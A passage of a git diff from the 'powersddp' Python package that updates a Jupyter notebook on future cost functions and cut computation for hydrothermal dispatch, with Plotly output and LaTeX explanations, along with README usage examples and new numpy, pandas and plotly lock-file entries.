qq2t08UqZOmR9rv/5ezvtOXhCUu0OxDftyNc/Puqlp5p30LmLJTGfe+fT/howdq4ehDxdv/mt/tVpiLoPmhr3Oi8Vl6tJ0zY6U3RVkrT7wAk91bzD7z4QHzt9mV7/MEuXi8sVropoyZpcPdeyU8wPAP1pdfkO8Q86D1XrtOE6e6FYpeU3NWLyYj3TomP0OeIciBMRERFRUOJAnIiIiIgeuWQeiBeevaw3Pu6tp5qn6qMuw1X8/9q5e5YuoDCMw9+nzZQgA8UhE0FBkCAQA8mXVCQECVs0FUTEpKmhwJfZr+Kg0CIugoNJ4FSmDo+D0CJBQsYf7utaz4HnnPXH4Rx/q3fLn+tR91jt7h/8VRC/vLyq1t6Jej4yf2vt6PikhqZXqunpq+rof1PvP2zVj5/nt85ZVfXxy0619U1V98DbWlzfrrnVjVpcv3lxftcIff7roubXNutxz3g97ByuF68Xau/r4R/vcJ9B/PT7Wc0sfKonvZPV0jVaA5NLtbt/8HuvIA4AQApBHAAAGsBd/xz/lwRxAABSCOIAANAABHEAALh/gjgAADSAB+0vq6VrpIamV/7r3J7B2Wp+NiyIAwAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABEEcQAAAAAAIgjiAAAAAABEEMQBAAAAAIggiAMAAAAAEEEQBwAAAAAggiAOAAAAAEAEQRwAAAAAgAiCOAAAAAAAEQRxAAAAAAAiCOIAAAAAAEQQxAEAAAAAiCCIAwAAAAAQQRAHAAAAACCCIA4AAAAAQARBHAAAAACACII4AAAAAAARBHEAAAAAACII4gAAAAAARBDEAQAAAACIIIgDAAAAABBBEAcAAAAAIIIgDgAAAABABEEcAAAAAIAIgjgAAAAAABGuAWuGU1+u9CwfAAAAAElFTkSuQmCC",
+ "text/html": [
+ "<div> <div id=\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\" class=\"plotly-graph-div\" style=\"height:900px; width:100%;\"></div> <script type=\"text/javascript\"> require([\"plotly\"], function(Plotly) { window.PLOTLYENV=window.PLOTLYENV || {}; if (document.getElementById(\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\")) { Plotly.newPlot( \"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\", [{\"mode\":\"lines\",\"name\":\"Stage 1\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x3\",\"y\":[6725.0,7.75,-0.0],\"yaxis\":\"y3\"},{\"mode\":\"lines\",\"name\":\"Stage 2\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x2\",\"y\":[11787.5,226.93,0.62],\"yaxis\":\"y2\"},{\"mode\":\"lines\",\"name\":\"Stage 3\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x\",\"y\":[15425.0,576.31,161.68],\"yaxis\":\"y\"}], {\"height\":900,\"template\":{\"data\":{\"bar\":[{\"error_x\":{\"color\":\"#2a3f5f\"},\"error_y\":{\"color\":\"#2a3f5f\"},\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"bar\"}],\"barpolar\":[{\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"barpolar\"}],\"carpet\":[{\"aaxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"baxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"type\":\"carpet\"}],\"choropleth\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"choropleth\"}],\"contour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"contour\"}],\"contourcarpet\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"contourcarpet\"}],\"heatmap\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmap\"}],\"heatmapgl\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmapgl\"}],\"histogram\":[{\"marker\":{\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"histogram\"}],\"histogram2d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2d\"}],\"histogram2dcontour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2dcontour\"}],\"mesh3d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"mesh3d\"}],\"parcoords\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"parcoords\"}],\"pie\":[{\"automargin\":true,\"type\":\"pie\"}],\"scatter\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter\"}],\"scatter3d\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter3d\"}],\"scattercarpet\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattercarpet\"}],\"scattergeo\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergeo\"}],\"scattergl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergl\"}],\"scattermapbox\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattermapbox\"}],\"scatterpolar\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolar\"}],\"scatterpolargl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolargl\"}],\"scatterternary\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterternary\"}],\"surface\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"surface\"}],\"table\":[{\"cells\":{\"fill\":{\"color\":\"#EBF0F8\"},\"line\":{\"color\":\"white\"}},\"header\":{\"fill\":{\"color\":\"#C8D4E3\"},\"line\":{\"color\":\"white\"}},\"type\":\"table\"}]},\"layout\":{\"annotationdefaults\":{\"arrowcolor\":\"#2a3f5f\",\"arrowhead\":0,\"arrowwidth\":1},\"autotypenumbers\":\"strict\",\"coloraxis\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"colorscale\":{\"diverging\":[[0,\"#8e0152\"],[0.1,\"#c51b7d\"],[0.2,\"#de77ae\"],[0.3,\"#f1b6da\"],[0.4,\"#fde0ef\"],[0.5,\"#f7f7f7\"],[0.6,\"#e6f5d0\"],[0.7,\"#b8e186\"],[0.8,\"#7fbc41\"],[0.9,\"#4d9221\"],[1,\"#276419\"]],\"sequential\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"sequentialminus\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]]},\"colorway\":[\"#636efa\",\"#EF553B\",\"#00cc96\",\"#ab63fa\",\"#FFA15A\",\"#19d3f3\",\"#FF6692\",\"#B6E880\",\"#FF97FF\",\"#FECB52\"],\"font\":{\"color\":\"#2a3f5f\"},\"geo\":{\"bgcolor\":\"white\",\"lakecolor\":\"white\",\"landcolor\":\"#E5ECF6\",\"showlakes\":true,\"showland\":true,\"subunitcolor\":\"white\"},\"hoverlabel\":{\"align\":\"left\"},\"hovermode\":\"closest\",\"mapbox\":{\"style\":\"light\"},\"paper_bgcolor\":\"white\",\"plot_bgcolor\":\"#E5ECF6\",\"polar\":{\"angularaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"radialaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"scene\":{\"xaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"yaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"zaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"}},\"shapedefaults\":{\"line\":{\"color\":\"#2a3f5f\"}},\"ternary\":{\"aaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"baxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"caxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"title\":{\"x\":0.05},\"xaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2},\"yaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2}}},\"title\":{\"text\":\"Future Cost Function\"},\"xaxis\":{\"anchor\":\"y\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis2\":{\"anchor\":\"y2\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis3\":{\"anchor\":\"y3\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"yaxis\":{\"anchor\":\"x\",\"domain\":[0.7333333333333333,1.0],\"title\":{\"text\":\"$/MW\"}},\"yaxis2\":{\"anchor\":\"x2\",\"domain\":[0.36666666666666664,0.6333333333333333],\"title\":{\"text\":\"$/MW\"}},\"yaxis3\":{\"anchor\":\"x3\",\"domain\":[0.0,0.26666666666666666],\"title\":{\"text\":\"$/MW\"}}}, {\"responsive\": true} ).then(function(){\n",
+ " \n",
+ "var gd = document.getElementById('5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25');\n",
+ "var x = new MutationObserver(function (mutations, observer) {{\n",
+ " var display = window.getComputedStyle(gd).display;\n",
+ " if (!display || display === 'none') {{\n",
+ " console.log([gd, 'removed!']);\n",
+ " Plotly.purge(gd);\n",
+ " observer.disconnect();\n",
+ " }}\n",
+ "}});\n",
+ "\n",
+ "// Listen for the removal of the full notebook cells\n",
+ "var notebookContainer = gd.closest('#notebook-container');\n",
+ "if (notebookContainer) {{\n",
+ " x.observe(notebookContainer, {childList: true});\n",
+ "}}\n",
+ "\n",
+ "// Listen for the clearing of the current output cell\n",
+ "var outputEl = gd.closest('.output');\n",
+ "if (outputEl) {{\n",
+ " x.observe(outputEl, {childList: true});\n",
+ "}}\n",
+ "\n",
+ " }) }; }); </script> </div>"
+ ]
+ },
+ "metadata": {},
+ "output_type": "display_data"
}
],
"source": [
- "import powersddp\n",
+ "from itertools import product\n",
+ "import numpy as np\n",
+ "\n",
+ "n_hgu = len(TestSystem.data['hydro-units'])\n",
+ "n_tgu = len(TestSystem.data['thermal-units'])\n",
+ "\n",
+ "step = 100/(TestSystem.data['discretizations']-1)\n",
+ "discretizations = list(product(np.arange(0,100+step,step), repeat=n_hgu))\n",
"\n",
- "system = powersddp.PowerSystem(path='system.yml')\n",
+ "cuts = []\n",
+ "operation = []\n",
+ "for stage in range(TestSystem.data['stages'],0,-1):\n",
+ " for discretization in discretizations:\n",
+ " \n",
+ " v_i = []\n",
+ " # For Every Hydro Unit\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " v_i.append(hgu['v_min'] + (hgu['v_max']-hgu['v_min'])*discretization[i]/100)\n",
+ " \n",
+ " # For Every Scenario\n",
+ " average = 0.\n",
+ " avg_water_marginal_cost = [0 for _ in TestSystem.data[\"hydro-units\"]]\n",
+ " for scenario in range(TestSystem.data['scenarios']):\n",
+ " inflow = []\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " inflow.append(hgu['inflow_scenarios'][stage-1][scenario])\n",
+ " \n",
+ " result = dispatch(TestSystem, v_i, inflow, cuts, stage+1)\n",
+ " average += result[\"total_cost\"]\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " avg_water_marginal_cost[i] += hgu[\"water_marginal_cost\"]\n",
"\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ " # Calculating the average of the scenarios\n",
+ " average = average/TestSystem.data['scenarios']\n",
+ " coef_b = average\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " # ! Invert the coeficient because of the minimization problem inverts the signal\n",
+ " avg_water_marginal_cost[i] = - avg_water_marginal_cost[i]/TestSystem.data['scenarios']\n",
+ " coef_b -= v_i[i]*avg_water_marginal_cost[i]\n",
+ " \n",
+ " cuts.append({\"stage\": stage, \"coef_b\": coef_b, \"coefs\": avg_water_marginal_cost})\n",
+ " operation.append({'stage': stage, 'discretization': discretization[i], 'v_i': v_i[0], 'average_cost': round(average,2)})\n",
+ "operation_df = pd.DataFrame(operation)\n",
+ "\n",
+ "if n_hgu == 1:\n",
+ " plot_future_cost_function(operation=operation_df)"
]
},
{
"cell_type": "code",
- "execution_count": 1,
- "id": "07837a84-da91-47bf-a749-d4292fde6d57",
+ "execution_count": 13,
+ "id": "87285cd1-3bb7-4c72-bb43-4f2baf6e4077",
"metadata": {},
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "text/html": [
+ "<div>\n",
+ "<style scoped>\n",
+ " .dataframe tbody tr th:only-of-type {\n",
+ " vertical-align: middle;\n",
+ " }\n",
+ "\n",
+ " .dataframe tbody tr th {\n",
+ " vertical-align: top;\n",
+ " }\n",
+ "\n",
+ " .dataframe thead th {\n",
+ " text-align: right;\n",
+ " }\n",
+ "</style>\n",
+ "<table border=\"1\" class=\"dataframe\">\n",
+ " <thead>\n",
+ " <tr style=\"text-align: right;\">\n",
+ " <th></th>\n",
+ " <th>stage</th>\n",
+ " <th>discretization</th>\n",
+ " <th>v_i</th>\n",
+ " <th>average_cost</th>\n",
+ " </tr>\n",
+ " </thead>\n",
+ " <tbody>\n",
+ " <tr>\n",
+ " <th>0</th>\n",
+ " <td>3</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>6725.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>1</th>\n",
+ " <td>3</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>7.75</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>2</th>\n",
+ " <td>3</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>-0.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>3</th>\n",
+ " <td>2</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>11787.50</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>4</th>\n",
+ " <td>2</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>226.93</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>5</th>\n",
+ " <td>2</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>0.62</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>6</th>\n",
+ " <td>1</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>15425.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>7</th>\n",
+ " <td>1</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>576.31</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>8</th>\n",
+ " <td>1</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>161.68</td>\n",
+ " </tr>\n",
+ " </tbody>\n",
+ "</table>\n",
+ "</div>"
+ ],
+ "text/plain": [
+ " stage discretization v_i average_cost\n",
+ "0 3 0.0 20.0 6725.00\n",
+ "1 3 50.0 60.0 7.75\n",
+ "2 3 100.0 100.0 -0.00\n",
+ "3 2 0.0 20.0 11787.50\n",
+ "4 2 50.0 60.0 226.93\n",
+ "5 2 100.0 100.0 0.62\n",
+ "6 1 0.0 20.0 15425.00\n",
+ "7 1 50.0 60.0 576.31\n",
+ "8 1 100.0 100.0 161.68"
+ ]
+ },
+ "execution_count": 13,
+ "metadata": {},
+ "output_type": "execute_result"
}
],
"source": [
- "import powersddp\n",
- "\n",
- "payload = {'load': [50, 50, 50],\n",
- " 'discretizations': 3,\n",
- " 'stages': 3,\n",
- " 'scenarios': 2,\n",
- " 'outage_cost': 500,\n",
- " 'hydro-units': [{'name': 'HU1',\n",
- " 'v_max': 100,\n",
- " 'v_min': 20,\n",
- " 'prod': 0.95,\n",
- " 'flow_max': 60,\n",
- " 'inflow_scenarios': [[23, 16],\n",
- " [19, 14],\n",
- " [15, 11]]}],\n",
- " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
- " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
- "\n",
- "system = powersddp.PowerSystem(data=payload)\n",
- "\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ "operation_df"
]
},
{
- "cell_type": "code",
- "execution_count": null,
- "id": "db680eea-a46e-4f24-a739-aae4117bb19e",
+ "cell_type": "markdown",
+ "id": "613592a2-e7e0-4b0a-81b9-a5d0126dde67",
"metadata": {},
- "outputs": [],
- "source": []
+ "source": [
+ "## Considering the Future Cost Function\n",
+ "\n",
+ "### Modelling the cost of water\n",
+ "\n",
+ "Now, let's consider the Future Cost Function to back propagate the solutions. By back propagating we assume that the future cost function of the \"stage ahead\" is used as input for the previous stage solution.\n",
+ "\n",
+ "Assuming that any Future Cost Function is aproximated by a series of straigh line discretizations. Any given point can be identified by a straight line, which is mathematically represented by:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\alpha = a \\cdot v_f + b\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "Where $\\alpha$ is cost at a given point of final volume. Where shall find the coeficients $a$ and $b$ \n",
+ "\n",
+ "- $a$: Is the marginal cost of the water, which comes from the solution of the minimization problem.\n",
+ "\n",
+ "If we assume $\\alpha = 75$ and $v_f = 60$ which means a cost of $\\$60.00$ at Final Volume $60 hm^3$, that gives us:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " b = \\alpha - a \\cdot v_f\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "> Naturaly, this process is repeated for every discretization used in the problem.\n",
+ "\n",
+ "> $a$ is given by the average value of every scenario considered when calculating the marginal cost of the water.\n",
+ "\n",
+ "If we evaluate for multiple Hydro Units, naturaly:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\alpha =b + \\sum_{i=1}^{n} a_i \\cdot v_{i}\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "Where $n$ = number of Hydro units\n",
+ "\n",
+ "### Considering the cost function in the back propagation\n",
+ "\n",
+ "In the previos stage (back propagating from the end to the beggining) we have the objetive function:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v + \\alpha\\\\\n",
+ " \\textrm{s.t.} \\quad & \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) - v_v(i) \\\\\n",
+ " \\textrm{load supplying} \\quad & \\rho\\cdot v_t(i) + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
+ " \\textrm{considering the forward state}\\quad & \\\\\n",
+ " \\textrm{for every scenario} `s` \\quad & \\alpha \\geq a^{s} \\cdot v_f(i) + b^{s}\\\\\n",
+ " \\textrm{constraints} \\quad & \\\\\n",
+ " & v_{f_{min}}\\leq v_f(i) \\leq v_{f_{max}}\\\\\n",
+ " & v_{t_{min}}\\leq v_t(i) \\leq v_{t_{max}}\\\\\n",
+ " & v_{v_{min}}\\leq v_v(i) \\leq v_{v_{max}}\\\\\n",
+ " & g_{t_{min}}\\leq g_t^\\ast \\leq g_{t_{max}}\\\\\n",
+ " ^\\ast \\textrm{for each TGU}& \n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$"
+ ]
}
],
"metadata": {
diff --git a/README.md b/README.md
index 9294885..e375b86 100644
--- a/README.md
+++ b/README.md
@@ -27,9 +27,9 @@ There are two ways of initializing a `Power System`. Either by providing a `.yml
### Initializing a `PowerSystem`
```Python
-import powersddp
+import powersddp as psddp
-system = powersddp.PowerSystem(path='system.yml')
+system = psddp.PowerSystem(path='system.yml')
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -39,25 +39,23 @@ print("System Load: {}\n"
```
```Python
-import powersddp
-
-payload = {'load': [50, 50, 50],
- 'discretizations': 3,
- 'stages': 3,
- 'scenarios': 2,
- 'outage_cost': 500,
- 'hydro-units': [{'name': 'HU1',
- 'v_max': 100,
- 'v_min': 20,
- 'prod': 0.95,
- 'flow_max': 60,
- 'inflow_scenarios': [[23, 16],
- [19, 14],
- [15, 11]]}],
- 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
- {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
-
-system = powersddp.PowerSystem(data=payload)
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -66,4 +64,37 @@ print("System Load: {}\n"
len(system.data['thermal-units'])))
```
+### Dispatching a `PowerSystem`
+
+#### **dispatch()** accepts the following arguments:
+
+- `verbose : bool, optional defaults to False`
+ - Displays the PDDE solution for every stage of the execution. Use with care, solutions of complex systems with too many stages and scenarios might overflow the console.
+
+- `plot : bool, optional, defaults to False`
+ - Displays a sequence of plots showing the future cost function for every stage of the execution.
+
+
+```Python
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
+operation = PowerSystem.dispatch()
+
+print(operation)
+```
<!-- <img src="https://render.githubusercontent.com/render/math?math=e^{i \pi} = -1"> -->
diff --git a/poetry.lock b/poetry.lock
index 7944ec3..a74fecf 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -683,6 +683,14 @@ docs = ["sphinx", "nbsphinx", "sphinxcontrib-github-alt", "sphinx-rtd-theme", "m
json-logging = ["json-logging"]
test = ["pytest", "coverage", "requests", "nbval", "selenium", "pytest-cov", "requests-unixsocket"]
+[[package]]
+name = "numpy"
+version = "1.21.1"
+description = "NumPy is the fundamental package for array computing with Python."
+category = "main"
+optional = false
+python-versions = ">=3.7"
+
[[package]]
name = "packaging"
version = "21.0"
@@ -694,6 +702,22 @@ python-versions = ">=3.6"
[package.dependencies]
pyparsing = ">=2.0.2"
+[[package]]
+name = "pandas"
+version = "1.3.2"
+description = "Powerful data structures for data analysis, time series, and statistics"
+category = "main"
+optional = false
+python-versions = ">=3.7.1"
+
+[package.dependencies]
+numpy = ">=1.17.3"
+python-dateutil = ">=2.7.3"
+pytz = ">=2017.3"
+
+[package.extras]
+test = ["hypothesis (>=3.58)", "pytest (>=6.0)", "pytest-xdist"]
+
[[package]]
name = "pandocfilters"
version = "1.4.3"
@@ -741,6 +765,18 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "plotly"
+version = "5.2.1"
+description = "An open-source, interactive data visualization library for Python"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+six = "*"
+tenacity = ">=6.2.0"
+
[[package]]
name = "pluggy"
version = "0.13.1"
@@ -863,7 +899,7 @@ testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "requests", "xm
name = "python-dateutil"
version = "2.8.2"
description = "Extensions to the standard Python datetime module"
-category = "dev"
+category = "main"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
@@ -874,7 +910,7 @@ six = ">=1.5"
